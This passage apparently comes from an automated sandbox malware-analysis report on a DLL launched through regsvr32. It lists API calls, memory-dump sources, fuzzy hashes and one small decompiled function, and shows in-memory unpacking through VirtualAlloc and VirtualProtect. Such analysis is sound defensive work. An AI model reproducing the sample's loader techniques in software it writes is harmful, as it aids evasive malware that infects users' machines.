                                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 167067550-0
                                                                                                                                                                                                                                                              • Opcode ID: ff7a087e773d734cc58cccf2d49463829b48733a0d021319afba073dfef6afad
                                                                                                                                                                                                                                                              • Instruction ID: 4f5b6ace61cfcbd5bed1309608b52992b8fc5a58fcfa4d7cb13b051f5542960c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff7a087e773d734cc58cccf2d49463829b48733a0d021319afba073dfef6afad
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0521A1B560461EAF9B109FE68ED0C9BB7AFEF0136D7108915F91997340E731EC608BA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: f03b424a33fbf30c51886c42bf5c6badee14af131e76dbd68f5da647e0325049
                                                                                                                                                                                                                                                              • Instruction ID: 6fa47e40a780d8f55e4dc70e6ed752161858b3cd09e2e4647465ecddc0323eaa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f03b424a33fbf30c51886c42bf5c6badee14af131e76dbd68f5da647e0325049
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20210B71A11A2AEBCF129FE59E44B5A376B9B02765F210510EC15A7380D770E968C5E0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,6E253991,?,00000001,6E24F667,?,6E253E50,00000001,?,?,?,6E24F5F6,?,?), ref: 6E24D3B1
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D40E
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D444
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,6E2800D0,000000FF,?,6E253E50,00000001,?,?,?,6E24F5F6,?,?,?,6E27EBD8,0000002C,6E24F667), ref: 6E24D44F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2283115069-0
                                                                                                                                                                                                                                                              • Opcode ID: 159597fc3addd0d6c3c5fa762aa2e71ca5660e3a1a154fbf5b4976c8d5df5936
                                                                                                                                                                                                                                                              • Instruction ID: 3a257786185b03f9f8f6d8d847e9e26fcefdaa92b1543fbfeb825a5efc82ecff
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 159597fc3addd0d6c3c5fa762aa2e71ca5660e3a1a154fbf5b4976c8d5df5936
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB11087620570EEBEB4817E4DC84E5B222F9BC2679F240A24F924532C0EFE198148D31
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000001,00000001,6E280096,6E24D67C,6E24D707,6E280094,?,6E247E19,6E280096,6E280094,?,?,?,6E244DCE,00000001,6E280098), ref: 6E24D508
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D565
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D59B
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,6E2800D0,000000FF,?,6E247E19,6E280096,6E280094,?,?,?,6E244DCE,00000001,6E280098), ref: 6E24D5A6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2283115069-0
                                                                                                                                                                                                                                                              • Opcode ID: e7d7f04536a26b918ae7f6218a6c63fd470937567c90455e1e85452cb41516e8
                                                                                                                                                                                                                                                              • Instruction ID: 3fbe758ef5b3d0dfee114181d74410be0e1429a27142f33ae9a0a033b7e5afb3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7d7f04536a26b918ae7f6218a6c63fd470937567c90455e1e85452cb41516e8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA110D762417099FEB4817F5DC84F5B126F97C367DB200B24F528972C0DFA18818C930
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,6E24A304,?,?,6E28C7C4,00000000,?,6E24A42F,00000004,6E2793A4,6E27939C,6E2793A4,00000000), ref: 6E24A2D3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                                                              • Opcode ID: 094aaf7dc9c5d0b9492766a295a3e0a2a94a1808b97f6b686fe6627315d2b9fc
                                                                                                                                                                                                                                                              • Instruction ID: f45c24725413bfac0acecefa81037dbe33f43e12206f538f9db9a3d623fcb14d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 094aaf7dc9c5d0b9492766a295a3e0a2a94a1808b97f6b686fe6627315d2b9fc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0211E7B1A51A3BEBDF56CBE8CC44B4933A6AB06771F110131ED10AB280F771E900D6E5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                                              			E6E20146C() {
                                                                                                                                                                                                                                                              				void* _t1;
                                                                                                                                                                                                                                                              				long _t3;
                                                                                                                                                                                                                                                              				void* _t4;
                                                                                                                                                                                                                                                              				long _t5;
                                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                                              				intOrPtr _t8;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t8 =  *0x6e2041b0;
                                                                                                                                                                                                                                                              				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                              				 *0x6e2041bc = _t1;
                                                                                                                                                                                                                                                              				if(_t1 == 0) {
                                                                                                                                                                                                                                                              					return GetLastError();
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_t3 = GetVersion();
                                                                                                                                                                                                                                                              				if(_t3 <= 5) {
                                                                                                                                                                                                                                                              					_t4 = 0x32;
                                                                                                                                                                                                                                                              					return _t4;
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					 *0x6e2041ac = _t3;
                                                                                                                                                                                                                                                              					_t5 = GetCurrentProcessId();
                                                                                                                                                                                                                                                              					 *0x6e2041a8 = _t5;
                                                                                                                                                                                                                                                              					 *0x6e2041b0 = _t8;
                                                                                                                                                                                                                                                              					_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                                                                              					 *0x6e2041a4 = _t6;
                                                                                                                                                                                                                                                              					if(_t6 == 0) {
                                                                                                                                                                                                                                                              						 *0x6e2041a4 =  *0x6e2041a4 | 0xffffffff;
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                                              0x6e20146d
                                                                                                                                                                                                                                                              0x6e20147b
                                                                                                                                                                                                                                                              0x6e201483
                                                                                                                                                                                                                                                              0x6e201488
                                                                                                                                                                                                                                                              0x6e2014d2
                                                                                                                                                                                                                                                              0x6e2014d2
                                                                                                                                                                                                                                                              0x6e20148a
                                                                                                                                                                                                                                                              0x6e201492
                                                                                                                                                                                                                                                              0x6e2014ce
                                                                                                                                                                                                                                                              0x6e2014d0
                                                                                                                                                                                                                                                              0x6e201494
                                                                                                                                                                                                                                                              0x6e201494
                                                                                                                                                                                                                                                              0x6e201499
                                                                                                                                                                                                                                                              0x6e2014a7
                                                                                                                                                                                                                                                              0x6e2014ac
                                                                                                                                                                                                                                                              0x6e2014b2
                                                                                                                                                                                                                                                              0x6e2014ba
                                                                                                                                                                                                                                                              0x6e2014bf
                                                                                                                                                                                                                                                              0x6e2014c1
                                                                                                                                                                                                                                                              0x6e2014c1
                                                                                                                                                                                                                                                              0x6e2014cb
                                                                                                                                                                                                                                                              0x6e2014cb

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E2017B8,74B063F0,00000000), ref: 6E20147B
                                                                                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 6E20148A
                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 6E201499
                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E2014B2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471393143.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471383950.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471419429.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471444834.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471467724.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 845504543-0
                                                                                                                                                                                                                                                              • Opcode ID: 9ea6dd9fb0518d842827008a03f0f9dc9d112dcd8ba4289fd613778a436585e2
                                                                                                                                                                                                                                                              • Instruction ID: 869fde4940c31e366ebd44cf0076d2c46c0c8dc6f120fb0d63c1d2df83f5f8ee
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ea6dd9fb0518d842827008a03f0f9dc9d112dcd8ba4289fd613778a436585e2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F03071645A119FFF909FA9AC0DB457BA7B726721F18801EF155D91C0D7F04182CBB4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,6E24F667,00000000,?,?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001), ref: 6E257C03
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001,00000000,00000001,?,6E253E74,6E24F5F6), ref: 6E257C0F
                                                                                                                                                                                                                                                                • Part of subcall function 6E257BD5: CloseHandle.KERNEL32(6E280910,6E257C1F,?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001,00000000,00000001), ref: 6E257BE5
                                                                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 6E257C1F
                                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,6E24F667,00000000,?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001,00000000), ref: 6E257C34
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseErrorHandleLast___initconout
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 892448922-0
                                                                                                                                                                                                                                                              • Opcode ID: b8a3c2d4f3e027c01c4519c95c00a2e43dd96b32b4bbfd7e1e847355b424f5e8
                                                                                                                                                                                                                                                              • Instruction ID: 0fad53ec8f39865773cb05afd6fdcb7d093020679fa9ef379c28d833fdf3d6f3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8a3c2d4f3e027c01c4519c95c00a2e43dd96b32b4bbfd7e1e847355b424f5e8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81F01C3615252DBBDF221FD1CD0CD8E3F67FB4A7A1F048410FA29952A0D6328930DBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                              • API String ID: 0-3922119987
                                                                                                                                                                                                                                                              • Opcode ID: 501f590428818e887053cf3f6616a71a42033faa34f44bd7d3758850a7eff650
                                                                                                                                                                                                                                                              • Instruction ID: 1ad3c28a8a6d09b50ad11c6972f6dde0f9bedd6cfce1a7e547426059725078ce
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 501f590428818e887053cf3f6616a71a42033faa34f44bd7d3758850a7eff650
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2341B675A4061DEFEB15DBDDCD819AEBBBEEF86B10F104566E4049B200DB704A48CB54
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,0000079C,00003000,00000040,0000079C,6E281E18), ref: 6E282480
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,000000C6,00003000,00000040,6E281E7C), ref: 6E2824B7
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00013F51,00003000,00000040), ref: 6E282517
                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E28254D
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(6E200000,00000000,00000004,6E2823A2), ref: 6E282652
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(6E200000,00001000,00000004,6E2823A2), ref: 6E282679
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000002,6E2823A2), ref: 6E282746
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000002,6E2823A2,?), ref: 6E28279C
                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2827B8
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.474069088.000000006E281000.00000040.00020000.sdmp, Offset: 6E281000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2574235972-0
                                                                                                                                                                                                                                                              • Opcode ID: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                              • Instruction ID: 4b26e144eb0f30125ca8cf8778d3c913a39bd59d814e1bc44f7fea5d4559b8e0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CD1A1762002869FDF05CF54C880F5277A6FF48710B0A45A4EE0AAF79BE771B854DB62
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3136044242-0
                                                                                                                                                                                                                                                              • Opcode ID: e19c01fcb2dabf9c0c44a239570506d0250d6b4427132a8591807f2bc07d51fd
                                                                                                                                                                                                                                                              • Instruction ID: 705ad72f6a5fe38e9a0e5b315135d9e22414935cab2c587c03429561aff63af6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e19c01fcb2dabf9c0c44a239570506d0250d6b4427132a8591807f2bc07d51fd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0215E71D0061EEBDB6A8F95C840EAE3A7BDB85B95B014525FC255E290C7308E418BA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6E247387
                                                                                                                                                                                                                                                                • Part of subcall function 6E247BA4: RtlInitializeSListHead.NTDLL(6E28C780), ref: 6E247BA9
                                                                                                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E2473F1
                                                                                                                                                                                                                                                              • ___scrt_fastfail.LIBCMT ref: 6E24743B
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                              • String ID: y$n
                                                                                                                                                                                                                                                              • API String ID: 2097537958-731774800
                                                                                                                                                                                                                                                              • Opcode ID: 03c773252a9e12d70e1c67b1885047d40bc49dc83ff66e8d85105ef952ee57e9
                                                                                                                                                                                                                                                              • Instruction ID: 8954ef7617c6d924e6ce9f91539b90214a53234a7020ba776fc2eebe994fa279
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03c773252a9e12d70e1c67b1885047d40bc49dc83ff66e8d85105ef952ee57e9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF218B7A54820FDBDB096BF8D8097EC3B679F1672EF148859D8A12B2C0CF610059CA66
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualProtectEx.KERNELBASE(000000FF,?,00000040,?), ref: 6E2435B3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                                                              • Opcode ID: 996d633ea626452ab40b7dfb5da83b087e001bb6e929cf651f99603bdff3cc6d
                                                                                                                                                                                                                                                              • Instruction ID: 9e621d7e490cae96721b55ff86c8e64f1fb65524c23add39a7f6dafa8c3cfb7f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 996d633ea626452ab40b7dfb5da83b087e001bb6e929cf651f99603bdff3cc6d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3711571902669CFEB08CF6DC498FAA7BE7BB57311F14415AE494C7381E2749A0CDBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E250978: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E2509B9
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252FBC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 614378929-0
                                                                                                                                                                                                                                                              • Opcode ID: b7804acc5ac8e76e4e277d302aae37f77a1a99be9d03590c493c00d748cf0a8c
                                                                                                                                                                                                                                                              • Instruction ID: 19001bb405a81033dcf205f635ce0e36f08974bfcd7d1d1abaa2b16f34c52d6a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7804acc5ac8e76e4e277d302aae37f77a1a99be9d03590c493c00d748cf0a8c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C01DBB360431A9BD3218F98D8849CAFBA9EB063B4F550A19E555B77C0D7706810CBA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E2509B9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                              • Opcode ID: 66f3c8a693f09f42fb919abce03e47394efc5414737a242b3a9abce372e767f5
                                                                                                                                                                                                                                                              • Instruction ID: 8aa9aa82f3e41d2da4603ccd25f63f87c821ec4ea9052e358124c3257df15ba9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66f3c8a693f09f42fb919abce03e47394efc5414737a242b3a9abce372e767f5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08F02B31A0562EDBFB014BE28E08F4B375FBF82F79B008011A814A628CEB20D46085A1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 6E25297E
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2556CE
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2556E0
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2556F2
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255704
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255716
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255728
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E25573A
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E25574C
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E25575E
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255770
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255782
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255794
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2557A6
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252973
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252995
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529AA
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529B5
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529D7
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529EA
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529F8
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A03
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A3B
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A42
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A5F
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A77
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                                                              • Opcode ID: 2706613bc3fe4d7871bb49d5b961138428d4b3bda9693c2543306a75642eae05
                                                                                                                                                                                                                                                              • Instruction ID: a1f6c58fbec234201d03a5bc36db65965b970f2bf4816e9e9d317b879f3df945
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2706613bc3fe4d7871bb49d5b961138428d4b3bda9693c2543306a75642eae05
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E317E7260430ADFEB648BB4D940B9673FABF00315F214919E859D7394DB31E8608F54
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2495CB
                                                                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 6E2495F2
                                                                                                                                                                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 6E2496FE
                                                                                                                                                                                                                                                              • CatchIt.LIBVCRUNTIME ref: 6E249753
                                                                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2497D9
                                                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 6E249860
                                                                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 6E24987B
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                                              • API String ID: 4234981820-393685449
                                                                                                                                                                                                                                                              • Opcode ID: b6b17fca80f3cb50e50b4d0ea7fb6e4f96aa1ff1f15266f60859f35ae1368ddf
                                                                                                                                                                                                                                                              • Instruction ID: 160249d89df068963552cd649ea77627728e6263509fd8de27253d315037fbcb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b17fca80f3cb50e50b4d0ea7fb6e4f96aa1ff1f15266f60859f35ae1368ddf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCC1477580420FEFCF19CFE8CA80A9EBBBAAF44315B10455AE8156B215D731DA61CFA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D27E
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
